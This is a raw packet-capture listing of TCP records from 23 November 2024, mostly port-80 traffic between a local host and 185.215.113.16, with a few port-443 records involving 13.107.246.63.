                                                                                                                                                                                  Nov 23, 2024 19:52:46.506525040 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.506649017 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.506938934 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.507178068 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.507289886 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.507332087 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.508255005 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.508299112 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.508361101 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.509366989 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.509437084 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.509538889 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.510431051 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.510499001 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.510538101 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.511552095 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.511564016 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.511604071 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.512597084 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.512691975 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.512717009 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.513700008 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.513809919 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.513921976 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.514761925 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.514887094 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.515336990 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.515875101 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.515927076 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.516011953 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.516933918 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.516973019 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.517167091 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.518047094 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.518147945 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.518178940 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.519109011 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.519216061 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.519295931 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.520220995 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.520268917 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.520320892 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.521281004 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.521385908 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.521943092 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.522363901 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.522471905 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.522625923 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.523493052 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.523542881 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.523567915 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.524547100 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.524646044 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.524765015 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.525623083 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.525767088 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.525825977 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.526813030 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.526891947 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.526959896 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.527919054 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.527990103 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.528163910 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.528923988 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.528975964 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.529197931 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.529989004 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.530035973 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.530247927 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.531080961 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.531270027 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.531277895 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.532193899 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.532306910 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.532311916 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.533257961 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.533308983 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.533359051 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.534342051 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.534396887 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.534538984 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.535418034 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.535532951 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.535532951 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.536531925 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.536741972 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.536787033 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.537609100 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.537653923 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.537802935 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.538678885 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.538777113 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.538949013 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.539774895 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.539866924 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.539887905 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.540900946 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.540961981 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.540999889 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.541950941 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.542026043 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.542222977 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.543041945 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.543103933 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.543282986 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.544127941 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.544168949 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.544239044 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.545196056 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.545320034 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.545424938 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.546268940 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.546329021 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.546333075 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.547385931 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.547399998 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.547435999 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.548449039 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.548537970 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.548548937 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.549614906 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.549628973 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.549666882 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.550661087 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.550753117 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.550770998 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.551778078 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.551873922 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.551892996 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.552783966 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.552841902 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.552874088 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.553466082 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.553899050 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.553997993 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.554092884 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.554970980 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.555061102 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.555068970 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.556065083 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.556159019 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.556159019 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.557130098 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.557226896 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.557245016 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.558204889 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.558264017 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.558286905 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.559298992 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.559348106 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.559393883 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.560401917 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.560483932 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.560578108 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.561480999 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.561533928 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.561583996 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.562555075 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.562612057 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.562628984 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.578032970 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.580720901 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.581278086 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:46.581294060 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.581741095 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:46.581746101 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.717374086 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.717438936 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.717509031 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.717677116 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.717794895 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.717875004 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.718775988 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.718885899 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.718969107 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.719832897 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.720189095 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.720309973 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.720359087 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.721376896 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.721461058 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.721463919 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.722382069 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.722445011 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.722465038 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.723599911 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.723656893 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.723788023 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.724534988 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.724622965 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.724648952 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.725622892 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.725718975 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.725836992 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.726727009 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.726762056 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.726788998 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.727807999 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.727869987 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.727917910 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.728923082 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.728980064 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.729041100 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.729970932 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.730015039 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.730073929 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.731054068 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.731169939 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.731218100 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.732146978 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.732249022 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.732291937 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.733666897 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.733705044 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.733747005 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.734395981 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.734462023 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.734499931 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.735402107 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.735522032 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.735526085 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.736471891 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.736601114 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.736660957 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.737591982 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.737668037 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.737674952 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.738667011 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.738718987 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.738847971 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.739774942 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.739844084 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.739876032 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.740823984 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.740875959 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.740993023 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.741940022 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.742055893 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.742165089 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.743000031 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.743105888 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.743190050 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.744080067 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.744117022 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.744185925 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.745168924 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.745235920 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.745459080 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.746243954 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.746375084 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.746378899 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.747380972 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.747518063 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.747529030 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.748425007 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.748509884 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.748569965 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.749512911 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.749587059 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.749599934 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.750597954 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.750683069 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.750812054 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.751770973 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.751862049 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.751866102 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.752820015 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.752963066 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.753007889 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.753640890 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.753849030 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.753963947 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.754076958 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.754923105 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.755038977 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.755062103 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.756016970 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.756133080 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.756186008 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.757128954 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.757164955 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.757208109 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.758204937 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.758269072 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.758313894 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.759284973 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.759382963 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.759536028 CET4976080192.168.2.7185.215.113.16
